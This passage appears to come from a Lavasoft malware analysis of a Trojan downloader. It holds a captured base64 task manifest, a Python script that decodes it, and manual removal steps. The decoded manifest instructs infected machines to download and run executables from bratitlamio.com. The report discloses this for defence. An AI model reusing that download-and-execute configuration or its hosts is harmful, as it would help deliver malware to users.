dGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd28iIH
ZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tLzMvMDAwMDAwL3dpenpjYXN0ZXJfaW5z
dGFsbGVyX3YyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQ
o8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iT25lVHdvIiB2YWx1ZT0ibm90d2FpdCIg
cGFyYW1zPSI1N2E3NjRkMDQyYmY4Ii8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iSGFoYS
IgdmFsdWU9IjAwMDE3MDgzMSIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0K
DQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJIYWhhIiB2YWx1ZT0iMTcwODMxIiBtYXRjaD
0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC90YXNrPjx0YXNrPg0KDQo8cGVyZm9y
bT4NCg0KPGRvd25sb2FkIG5hbWU9IlNobzlsaWJpIiB2YWx1ZT0iaHR0cDovL2JyYXRpdG
xhbWlvLmNvbS9leGUvdXBkYXRlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5l
dD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IlNobzlsaWJpIiB2YW
x1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9IkRhdGUi
IHZhbHVlPSJmZThmMTcwODMxIi8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQ
oNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkRhdGUiIHZhbHVlPSIxNzA4MzEiIG1h<<< skipped >>>
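The body returned by remotes_xml_sections.php is the task manifest that drives everything else in this report: it is base64 text, and every space inside it sits exactly where base64 needs a '+', so the capture tool evidently form-decoded the response before printing it. The Python below is an added example (not part of the Lavasoft report and not the malware's own code) that restores the '+' characters, decodes the visible part of the blob, and walks the XML with a tolerant regex parser because the capture is cut off inside the third task. The treatment of spaces as '+' is an inference from the blob itself; the field names come straight from the decoded XML.

```python
import base64
import re

# The visible part of the base64 body from the capture above; the tail was cut
# off at "<<< skipped >>>".  In-line spaces are where '+' characters belong.
CAPTURED_MANIFEST = """
PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tL2Zy
b21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIH
NvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9
IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxNzA4MzEiLz4NCg0KPC9wZXJmb3Jt
Pg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbmUiIH
ZhbHVlPSI0NTE3MDgzMSIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwv
dGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd28iIH
ZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tLzMvMDAwMDAwL3dpenpjYXN0ZXJfaW5z
dGFsbGVyX3YyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQ
o8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iT25lVHdvIiB2YWx1ZT0ibm90d2FpdCIg
cGFyYW1zPSI1N2E3NjRkMDQyYmY4Ii8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iSGFoYS
IgdmFsdWU9IjAwMDE3MDgzMSIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0K
DQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJIYWhhIiB2YWx1ZT0iMTcwODMxIiBtYXRjaD
0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC90YXNrPjx0YXNrPg0KDQo8cGVyZm9y
bT4NCg0KPGRvd25sb2FkIG5hbWU9IlNobzlsaWJpIiB2YWx1ZT0iaHR0cDovL2JyYXRpdG
xhbWlvLmNvbS9leGUvdXBkYXRlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5l
dD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IlNobzlsaWJpIiB2YW
x1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9IkRhdGUi
IHZhbHVlPSJmZThmMTcwODMxIi8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQ
oNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkRhdGUiIHZhbHVlPSIxNzA4MzEiIG1h
"""

TAG_RE = re.compile(r"<(download|process|mod)\b([^>]*)/>")
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')


def repair_base64(blob: str) -> bytes:
    """Join the wrapped lines, restore '+' for every in-line space and decode.
    Padding is re-added in case the capture stopped mid-quantum."""
    joined = "".join(line.strip().replace(" ", "+") for line in blob.splitlines())
    joined += "=" * (-len(joined) % 4)
    return base64.b64decode(joined)


def parse_manifest(xml_text: str) -> list:
    """One record per <task>: what to download, how to start it, the marker the
    task records (<mod type="add">) and the check in <conditions>.  A regex walk
    is used instead of an XML parser because the last captured task is unterminated."""
    tasks = []
    for chunk in xml_text.split("<task>")[1:]:
        task = {"download": None, "process": None, "marker": None, "condition": None}
        for m in TAG_RE.finditer(chunk):
            kind, attrs = m.group(1), dict(ATTR_RE.findall(m.group(2)))
            if kind == "mod":
                kind = "marker" if attrs.get("type") == "add" else "condition"
            task[kind] = attrs
        tasks.append(task)
    return tasks


def decode_manifest(blob: str) -> dict:
    """Full pipeline: repaired base64 -> XML text -> refresh interval and task list."""
    text = repair_base64(blob).decode("utf-8", errors="replace")
    refresh = re.search(r'<updates refresh="(\d+)"', text)
    return {"refresh": int(refresh.group(1)) if refresh else None,
            "tasks": parse_manifest(text)}


MANIFEST = decode_manifest(CAPTURED_MANIFEST)

if __name__ == "__main__":
    for t in MANIFEST["tasks"]:
        d, p = t["download"], t["process"]
        print(f'{d["name"]:9} <- {d["value"]}  start={p["value"]} params={p["params"]}')
```

The decoded manifest ties the rest of the report together: the three download names (SecondL, OneTwo, Sho9libi) are the file names written to %Temp%\243GKURU6R, the three URLs are the AdsShow_installer.exe, wizzcaster_installer_v2.exe and updater.exe GETs above, Sho9libi is started with value="wait" while the other two are started with "notwait", and OneTwo receives params="57a764d042bf8", the same uid later POSTed to ladomainadeserver.com/api/v5/config. Every marker value embeds 170831, the capture date in YYMMDD form, so the <conditions> checks appear to gate each task on a per-day marker; the exact semantics of the add/check pairs cannot be confirmed from the truncated capture.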
The Trojan connects to the servers at the following location(s) (see the URLs table above):
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3360
%original file name%.exe:3496
Sho9libi.exe:3352
SecondL.exe:2304
OneTwo.exe:2324
mt2nc53t201.exe:3588
9HE87PWAK.exe:2628
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\OneTwo.exe (7856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\Sho9libi.exe (146738 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\SecondL.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\SecondL.exe.config (1 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe.config (1 bytes)
%Program Files%\9HE87PWAKQ\9HE87PWAK.exe (53713 bytes)
%Program Files%\9HE87PWAKQ\9HE87PWAK.exe.config (1 bytes)
%Program Files%\9HE87PWAKQ\uninstaller.exe (19389 bytes)
%Program Files%\9HE87PWAKQ\uninstaller.exe.config (1 bytes)
%Program Files%\9HE87PWAKQ\cast.config (37 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (1404 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (1404 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
(The last three are the .NET runtime's policy cache files, regenerated whenever a managed executable runs; deleting them is harmless but removes nothing malicious.)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_HA00P" = "C:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"lb5nwgevyag" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe"
"34Y2QEO0XU7NPC7" = "%Program Files%\9HE87PWAKQ\9HE87PWAK.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.